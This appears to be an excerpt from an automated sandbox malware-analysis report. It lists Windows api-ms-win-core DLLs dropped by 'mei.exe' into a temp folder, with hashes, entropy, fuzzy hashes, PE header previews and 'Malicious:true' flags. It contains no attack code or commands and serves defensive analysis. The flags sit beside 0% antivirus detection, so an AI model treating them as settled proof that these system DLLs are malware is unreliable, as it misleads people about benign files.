                                                                                                                                                                    Entropy (8bit):4.849974715185316
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:5WyhWMUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfZyF+T6N:5WyhWMU8JIYiaHZ8ZpH3GCJEByF+T6N
                                                                                                                                                                    MD5:9BD152E5C2289C4E94699B9852341711
                                                                                                                                                                    SHA1:5E259E832D5E7263016552FBDE776A3DBADE4744
                                                                                                                                                                    SHA-256:88D67179923A161A8CD3D6552FDF036343841BF8B51E63A7A116A460244531E7
                                                                                                                                                                    SHA-512:3C0412B74C765F40CAE7BA0A335124F6D61AA863074322A0389B454C9233964F37AD296DEE8147BC5FECDC18853540990D61F4A6B0C17DEF617BFDB811FDBC98
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....r.q.........." .........0...............................................@......qg....`A........................................p................0...............0...)..............p............................................................................rdata..`...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):27016
                                                                                                                                                                    Entropy (8bit):5.077850919974628
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:8PvVXIWyhW6U8JIYiaHZ8ZpH3GCJEby9ylNiz:8PvVXgkYiQZiRBEbVY
                                                                                                                                                                    MD5:CB098466D833BCA71D4B5A3140121A96
                                                                                                                                                                    SHA1:9FEF686D977061A70395E713F71FCD35ACEE28FF
                                                                                                                                                                    SHA-256:FD15984E6068D3127A337907FF88357DD4D807D49B682B2060D22AE3AA874140
                                                                                                                                                                    SHA-512:04066EA48904E1C98F0FA1151C2F5C9B9F31009DF61E07513D30DE9A22D80308761AB1CE469B1860DD1E0BB51647FA928FAD943C4614DDA1BDEA9680007D78FA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....(............" .........@...............................................P......Sm....`A........................................p................@...............@...)..............p............................................................................rdata..|........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l1-2-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.881222757642056
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:Z7WWyhWvU8JIYiaHZ8ZpH3GCJEKyj0Esf:Z7avYiQZiRBEKH
                                                                                                                                                                    MD5:2083C4C18B0B2D501995BF1AF79BBCF1
                                                                                                                                                                    SHA1:9CBD7DD86FBA3F1829D2F9614CAA83958F690E99
                                                                                                                                                                    SHA-256:01B61D57BA1290BF2640ECEE28DE3D240EEB09E9C664C0F4D0F9402CD1DA5EAF
                                                                                                                                                                    SHA-512:5EB5455989E1DBC8655C510D2B596D422078ECEF8342D9D10797EBA2D8AA1562B9037EDE35F00222C3CFB6F46E003BD4BD1E17FAA2D19E0AEB63E970C978DA23
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....RS.........." .........0...............................................@............`A........................................p...L............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-file-l2-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.961465474137138
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:vrWyhWmUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEflytSu7Qjq:vrWyhWmU8JIYiaHZ8ZpH3GCJEtytSu7t
                                                                                                                                                                    MD5:AAF93EF5C6ECA9434286274EF91794DD
                                                                                                                                                                    SHA1:B68CD2F56E5C840346E3AD52255A6061C1797A7B
                                                                                                                                                                    SHA-256:4413208101061038455B7E0752FB37D4108B3EC4642D10CBADDF835B3843888E
                                                                                                                                                                    SHA-512:04A30769851B829E71BA0AB3F1A76ECEAE565DD639047B4C6FF9952BC4D6502D117EEC81E151843DFAA147894E3046A333E39D2DAE2AE65EFFD7DC1B91368541
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....d..........." .........0...............................................@......~.....`A........................................p................0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.88599230992414
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:C3WyhWYU8JIYiaHZ8ZpH3GCJEIy41IZAJH:CViYiQZiRBEIgqH
                                                                                                                                                                    MD5:BB3AA9C7A2AB9D9218E8C9EF4E4193EF
                                                                                                                                                                    SHA1:DDCF7AAAD6A6FB45A065B96CD259987DDA784DBE
                                                                                                                                                                    SHA-256:2A20ED31A3E9D57C21C0F9D48D230443C8B9297E934CF3257B5F9BFC75CC0A0C
                                                                                                                                                                    SHA-512:087F24BC689F54049AA5A0C154DF7D367B48B4F54623918769DEA180739FE0C2A653F83BA3197D54EF432ECD32D25264B27B52E5E02D41E7A4227C3D716B1563
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.984365393973259
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:FdxltWyhWuU8JIYiaHZ8ZpH3GCJE2yA2Pv6l1:rsYiQZiRBE2t
                                                                                                                                                                    MD5:62B205564ADA337C10F39B9D2AD83C13
                                                                                                                                                                    SHA1:DD29D0EEAB8AD7F936BAA5DF86527D6D490A4BFE
                                                                                                                                                                    SHA-256:B6798C4723BDBF2455C19E8C15F76E7222A329EBC2C7A2FA014F2A581E9F5C35
                                                                                                                                                                    SHA-512:6AA7C0443B0178FB4F3A8E7B51C1CCACCE44B5A5AE40FD3012EC32089D299C06ADD0FDB071EF0E5E2F483DA579EDAFB229FBC472AE0B377EAFA663106785178B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@............`A........................................p................0...............0...)..............p............................................................................rdata..|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.916693653451262
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:lWyhWJEU8JIYiaHZ8ZpH3GCJEGyE/BWcyv:v6TYiQZiRBEGUv
                                                                                                                                                                    MD5:CD9D5FD919925650CD2D7301F722BF4D
                                                                                                                                                                    SHA1:BB06CBD01F141E75EBAFAF4446983267109979BF
                                                                                                                                                                    SHA-256:B24434F58BEC151DBBFDDAC528DBE6E65EC3CC38CD5631B3392031ACD1F82DF8
                                                                                                                                                                    SHA-512:D9764357ADCC79D2473F9F5330F2C371358B2CB312BC21E321D2C92345D708C5247AE0E57D6ED5EF47DFF8636862835DFAEC2EABCD2203D16E69158AD7A90B55
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@.......#....`A........................................p................0...............0...)..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.123946863228064
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:zTvuBL3BWWyhWiU8JIYiaHZ8ZpH3GCJEXyGTOCEZX:mBL3BawYiQZiRBEXp1iX
                                                                                                                                                                    MD5:E5878F90E26BF685F733ECB2A238D3DC
                                                                                                                                                                    SHA1:751E5AB0FA72C54255FD1C9D45A9F69D02F44458
                                                                                                                                                                    SHA-256:6873C614AE5C9AE92F526C3558F4204AA8ABF603A7CAA59AB45677035C26B2CC
                                                                                                                                                                    SHA-512:4A12F8AE48E0D9D7C6D0BF2BA349F40AF276CBFDB60E220C85134224712FA9ED820EEF0162FC1F519978F582DE586D1CA4D280F23C349761CE5C5AF9933AD855
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@.......`....`A........................................p................0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.5843399236393685
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:unaOMw3zdp3bwjGzue9/0jCRrndb7WyhW6U8JIYiaHZ8ZpH3GCJEFyor:TOMwBprwjGzue9/0jCRrndbhsYiQZiRI
                                                                                                                                                                    MD5:9E1E3021560384DB14B76243DF9604E4
                                                                                                                                                                    SHA1:F79A3241314F18DB0B979AF8E114C191D499A7C9
                                                                                                                                                                    SHA-256:197B29BA3989E8D974E29F81FBDDD0731051399DC40763BDA998A1E36D1C3AB4
                                                                                                                                                                    SHA-512:3187122BD3E20DC74EFAC802B86C612573682370A8B24C3EC7769E67DE525B68C91506B85DF3EA2D028D4018D14833C980AB2B220AEE41B96E2DD9C9D0A67914
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@............`A........................................p................0...............0...)..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.015698105340131
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:lAWyhWtU8JIYiaHZ8ZpH3GCJEpyhMuVR1:65YiQZiRBEpEnT1
                                                                                                                                                                    MD5:4738EC3E5B38E0BB087AA48598EC29AC
                                                                                                                                                                    SHA1:E6FB5A7B1C9006FC857582B85893563E3E9DAD57
                                                                                                                                                                    SHA-256:9C8680CAF042B7DFC1D5ED46617CB7FB005B86D97D968D7663E04902867098EA
                                                                                                                                                                    SHA-512:86427187868629E6C91E99B7F1F689FBC43988C86E530E9F9EFD64DA8B098A3D27F3A3086337D06508FB5D2F93C47AA2F5D1904A256B96CD155AA8294E5C4D36
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@.......Q....`A........................................p...l............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.962510009751117
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:rdWyhWiiUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfh4yWPrifbZE:rdWyhWNU8JIYiaHZ8ZpH3GCJEJ4y0QZE
                                                                                                                                                                    MD5:F9E6C360176E96CC0D995598FD78D6A1
                                                                                                                                                                    SHA1:17B31CC30208D9ED0A543454C04D31799C20B871
                                                                                                                                                                    SHA-256:572781609F3E787DC36B634B6D9C938652881E4A99B5138EBB3540CB2E41CBB9
                                                                                                                                                                    SHA-512:299AC44C65C00A8B72D629186125096AC01920B96BDE79D86A10BCE1EA1EF2B5BA74C61892CAC97732AB7068A1CCAD20F0AE17EF08C8D675F3A72E910534542B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@............`A........................................p................0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.140781203033798
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:wFqWyhWpEU8JIYiaHZ8ZpH3GCJEIy6VHut:fgYiQZiRBEIzOt
                                                                                                                                                                    MD5:1DDEA4C5680A97E156A813D088D38B9D
                                                                                                                                                                    SHA1:8BC658F97427DF3284F8BC004564BDD9EA355D7C
                                                                                                                                                                    SHA-256:9B92DA261EC648267AABDB5C70FB2FF04EA579E732757C8D2C81AE7E7ED303EB
                                                                                                                                                                    SHA-512:36595FBE4444BC9D0610F4AFDAE5F71EE3F5936FC0DDD9F10FCE46B42FA0D6F80994D722C19A75B6DC18A0FE8B985E126BC73815AD9C6B96F34E65CDCC70DFF5
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@......6.....`A........................................p...H............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.462150808575281
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:0ck1JzNcKSIAWyhWUU8JIYiaHZ8ZpH3GCJE+yV7mo:ScKSBWYiQZiRBE+Qr
                                                                                                                                                                    MD5:D2CBCC819F1D8983EDC995A590AF810B
                                                                                                                                                                    SHA1:4ACBC44ECA3D20D3675F5281949B319708A21E66
                                                                                                                                                                    SHA-256:FFD0BEBB1FF0F83EB81406BE8AE753D199461CC4804DF756904DBC30582CAC6A
                                                                                                                                                                    SHA-512:D0A6E05889C96CA756E7569EA153174F994C7806F8BFE93857B3D5559E10CD1B9A68F853AF577F12F8B2664366B41F9978F4E23602D4326A7ED81C1B045ECD7D
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......9.....`A........................................p................0...............0...)..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.054035116626191
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:nrDfIegWyhW6U8JIYiaHZ8ZpH3GCJEByEf:geoMYiQZiRBEBr
                                                                                                                                                                    MD5:BF87834418025B5894D2130668352125
                                                                                                                                                                    SHA1:EF15F9B1AE6FB271549DD2CEF8FB11BA5633C865
                                                                                                                                                                    SHA-256:408081A4655EE846C1067AAAFE462A62FA3A562341E681D0DBBF3400362F5CF7
                                                                                                                                                                    SHA-512:B115687E542FC1A7F342CF610C450DC726D79E7B8E63BB2D5761A47464796FBF8C880ED811149443734F0D47C4CF8B2694A3703004D69CBD62FBF2A96D9667EC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@......,.....`A........................................p................0...............0...)..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.846650915091254
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:jWyhWTIiUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfbyLBMAEJVax:jWyhWTXU8JIYiaHZ8ZpH3GCJETyiZJo
                                                                                                                                                                    MD5:B382531B6D3B7A7E41CEE82EC972045F
                                                                                                                                                                    SHA1:D77DC95412A384F6C51AE61B4E405753689D6EE5
                                                                                                                                                                    SHA-256:409B4ABB42BE87243FFA92E857C82B8726F658AC7F66655A9FEEC998307790B0
                                                                                                                                                                    SHA-512:D939815A8A1EDA1B8B11517FC15273A7E4A96D505D7F3E15BB5D17C25A9FE214DF4E16A9386FD1CD86BB0164F1B3A72A4BFA8705FB0685F8A8A69DD8A72F13C2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0...)..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.00702422208925
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:jGeVjWyhWWU8JIYiaHZ8ZpH3GCJEKy/88/0:jGeV50YiQZiRBEKF
                                                                                                                                                                    MD5:0554B70C980EBE8AB81E4954762A64BA
                                                                                                                                                                    SHA1:B35A08B0F2689985A4376770F587CCB766FAA309
                                                                                                                                                                    SHA-256:29B37632C942D5794803CF20F92412843045AB49FC480B61F441B4F3DF7F2B10
                                                                                                                                                                    SHA-512:56E397EF65D4D2DB15D1C6D29DCBF1F84AD426F9BE2B2B46891C59EC42845BD3DC23269A0F4291BABA7BE6932F799BDE2CE8DC7D60B752FFA9A2B9A33E290A7B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@............`A........................................p...<............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-string-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.922430617905241
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:qZyMvJWyhWSU8JIYiaHZ8ZpH3GCJEkyefaFJWR:qZyMvbwYiQZiRBEkjCWR
                                                                                                                                                                    MD5:62326CA9E107A6E302727411FA5EE5DA
                                                                                                                                                                    SHA1:99C731E618BE3B061C4A3C6A80B69E81D97E5BD8
                                                                                                                                                                    SHA-256:9B7433C6AE09A0EC60361064CF970D7DF92E598BF2A342FFEDD42B931F26F457
                                                                                                                                                                    SHA-512:6308A92318DCF623CE9FFFFFBFF6EF7B5FC8450D7CFF41AF674FBBBE8A6E7A65B0B1B1C63AA74D91A054ADD9E550D5F71067782649C89B0C94628A698AE97033
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@.......q....`A........................................p................0...............0...)..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.381198763623471
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:yBwidv3V0dfpkXc0vVaC4WyhW0U8JIYiaHZ8ZpH3GCJEAkryt1HJgNm:AHdv3VqpkXc0vVaj+YiQZiRBELrspg0
                                                                                                                                                                    MD5:7C5FDE19AE275D60120A0B46F386FD6A
                                                                                                                                                                    SHA1:D3D26D250DC154FAEC65B7A34DE408EA4771EFEA
                                                                                                                                                                    SHA-256:C8E39897C5520E777D8DB974DD2F40B4AE390AED351F34B90023BEC768A44D10
                                                                                                                                                                    SHA-512:E27226BD6246E6B2A4FF6D0417CF85FFA19A40EA233ED03AEACB7A19197FA40B21F4D3529AFF2D0D66D511CECB70B327A375D9774FD8DFACD282E6FFB0A319D4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@............`A........................................p...X............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-synch-l1-2-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.081726234720864
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:EtZ3FWyhWfU8JIYiaHZ8ZpH3GCJEHbyfy+D0c:m3YiQZiRBEHbJM
                                                                                                                                                                    MD5:0927164B4C0515DB1A1B2A2CB8DA7017
                                                                                                                                                                    SHA1:D853A2CE2C2198C20ED636D1300098B984281D62
                                                                                                                                                                    SHA-256:B4EB43A8486AAB2E9393C9B026D5624C8348A8178985574FE50DADC16D130776
                                                                                                                                                                    SHA-512:C88A5FDA2A0B8FA97AA803D5511EB3C59D50C5B89AFBEBE5E46FD3D0A5275DF955362DBFDFBB3F3DD7C14EB588C3103AB1B47419CF8254861174B2A13C5BB586
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p...x............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-sysinfo-l1-1-0.dll

                                                                                                                                                                    Download File
